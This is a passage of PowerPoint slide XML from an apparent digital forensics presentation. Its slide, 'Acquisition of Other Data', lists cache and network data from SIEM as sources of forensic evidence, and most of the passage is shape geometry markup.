              <a:rPr dirty="0" sz="22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2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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence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56223" y="306451"/>
            <a:ext cx="45434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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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47844" y="760476"/>
            <a:ext cx="6443472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07260" y="1933193"/>
            <a:ext cx="1286954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Inside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computer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systems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networks,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there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other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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>potential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sources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forensic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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data,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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>such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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>as: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13376" y="5128259"/>
            <a:ext cx="8387080" cy="972819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8387080" h="972820">
                <a:moveTo>
                  <a:pt x="8224520" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="162051" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118959" y="5786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80245" y="22116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47450" y="47450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22116" y="80245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5786" y="118959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="162051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="810259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5786" y="853352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22116" y="892066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47450" y="924861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80245" y="950195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118959" y="966525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162051" y="972312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8224520" y="972312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8267612" y="966525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8306326" y="950195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8339121" y="924861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8364455" y="892066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380785" y="853352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8386572" y="810259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8386572" y="162051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380785" y="118959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8364455" y="80245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8339121" y="47450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8306326" y="22116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8267612" y="5786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8224520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910328" y="3127248"/>
            <a:ext cx="8385175" cy="1009015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8385175" h="1009014">
                <a:moveTo>
                  <a:pt x="8216900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="168148" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123457" y="6008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83293" y="22963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49260" y="49260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22963" y="83293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6008" y="123457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="840739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6008" y="885430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22963" y="925594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49260" y="959627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83293" y="985924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123457" y="1002879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="1008888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8216900" y="1008888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8261590" y="1002879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8301754" y="985924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8335787" y="959627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8362084" y="925594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8379039" y="885430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="840739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="168148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8379039" y="123457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8362084" y="83293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8335787" y="49260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8301754" y="22963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8261590" y="6008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8216900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321046" y="5063853"/>
            <a:ext cx="7359015" cy="79184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dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Cache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37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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>files)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cache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17363" y="3120923"/>
            <a:ext cx="2403475" cy="79057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dirty="0" sz="2200" spc="130" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Network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37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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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150">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SIEM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55720" y="3147060"/>
            <a:ext cx="864235" cy="844550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="864235" h="844550">
                <a:moveTo>
                  <a:pt x="432053" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384974" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="422148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384974" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432053" y="844295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="841819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="834560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="822777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="806726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="786666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="762853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="735545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="705000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="671474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="635225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="596511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="555589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="512716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="468150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864107" y="422148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="376145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="331579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="288706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="247784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="209070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="172821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="139295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="108750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="81442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="57629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="37569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="21518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="9735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="2476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432053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196334" y="3374898"/>
            <a:ext cx="1847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0" b="1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855720" y="5135879"/>
            <a:ext cx="864235" cy="843280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="864235" h="843279">
                <a:moveTo>
                  <a:pt x="432053" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384974" y="2473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="9721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="21488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="37515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="57545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="81320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="108584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="139079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="172547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="208731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="247374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="288218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="331007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="375481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="421386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535" y="467290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9964" y="511764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22024" y="554553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38452" y="595397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58984" y="634040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83356" y="670224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111305" y="703692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142568" y="734187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176881" y="761451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213980" y="785226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253603" y="805256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="821283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339363" y="833050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384974" y="840298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432053" y="842772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="840298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="833050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="821283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="805256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="785226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="761451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="734187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="703692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="670224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="634040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="595397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="554553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="511764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="467290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864107" y="421386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861572" y="375481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854143" y="331007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842083" y="288218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825655" y="247374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="805123" y="208731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780751" y="172547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752802" y="139079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721539" y="108584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687226" y="81320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650127" y="57545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="610504" y="37515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568622" y="21488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524744" y="9721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479133" y="2473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432053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196334" y="5363083"/>
            <a:ext cx="1847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0" b="1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48555" y="6123432"/>
            <a:ext cx="8385175" cy="1565275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8385175" h="1565275">
                <a:moveTo>
                  <a:pt x="8124190" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="260858" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213981" y="4204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169856" y="16325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129220" y="35625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92811" y="61366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61366" y="92811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35625" y="129220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16325" y="169856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4204" y="213981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="260858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1304290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4204" y="1351166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16325" y="1395291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35625" y="1435927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61366" y="1472336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92811" y="1503781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129220" y="1529522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169856" y="1548822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213981" y="1560943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260858" y="1565148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8124190" y="1565148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8171066" y="1560943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8215191" y="1548822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8255827" y="1529522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8292236" y="1503781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8323681" y="1472336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8349422" y="1435927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8368722" y="1395291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380843" y="1351166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="1304290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="260858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8380843" y="213981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8368722" y="169856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8349422" y="129220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8323681" y="92811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8292236" y="61366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8255827" y="35625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8215191" y="16325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8171066" y="4204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8124190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463796" y="4474464"/>
            <a:ext cx="8385175" cy="1050290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8385175" h="1050289">
                <a:moveTo>
                  <a:pt x="8210042" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="175005" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128484" y="6251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86679" y="23894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51260" y="51260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23894" y="86679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6251" y="128484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="175006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="875030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6251" y="921551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23894" y="963356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51260" y="998775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86679" y="1026141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128484" y="1043784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175005" y="1050036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8210042" y="1050036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8256563" y="1043784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8298368" y="1026141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333787" y="998775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8361153" y="963356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8378796" y="921551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="875030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8385048" y="175006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8378796" y="128484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8361153" y="86679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333787" y="51260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8298368" y="23894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8256563" y="6251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8210042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463796" y="1955292"/>
            <a:ext cx="8385175" cy="1920239"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8385175" h="1920239">
                <a:moveTo>
                  <a:pt x="8065008" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="320039" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272739" y="3469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227596" y="13547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185105" y="29740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145761" y="51552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110057" y="78490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78490" y="110057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51552" y="145761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29740" y="185105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13547" y="227596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3469" y="272739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1600199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3469" y="1647500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13547" y="1692643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29740" y="1735134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51552" y="1774478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78490" y="1810182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110057" y="1841749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145761" y="1868687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185105" y="1890499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227596" y="1906692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272739" y="1916770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320039" y="1920239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8065008" y="1920239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112308" y="1916770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8157451" y="1906692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8199942" y="1890499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8239286" y="1868687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8274990" y="1841749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8306557" y="1810182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8333495" y="1774478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8355307" y="1735134"/>
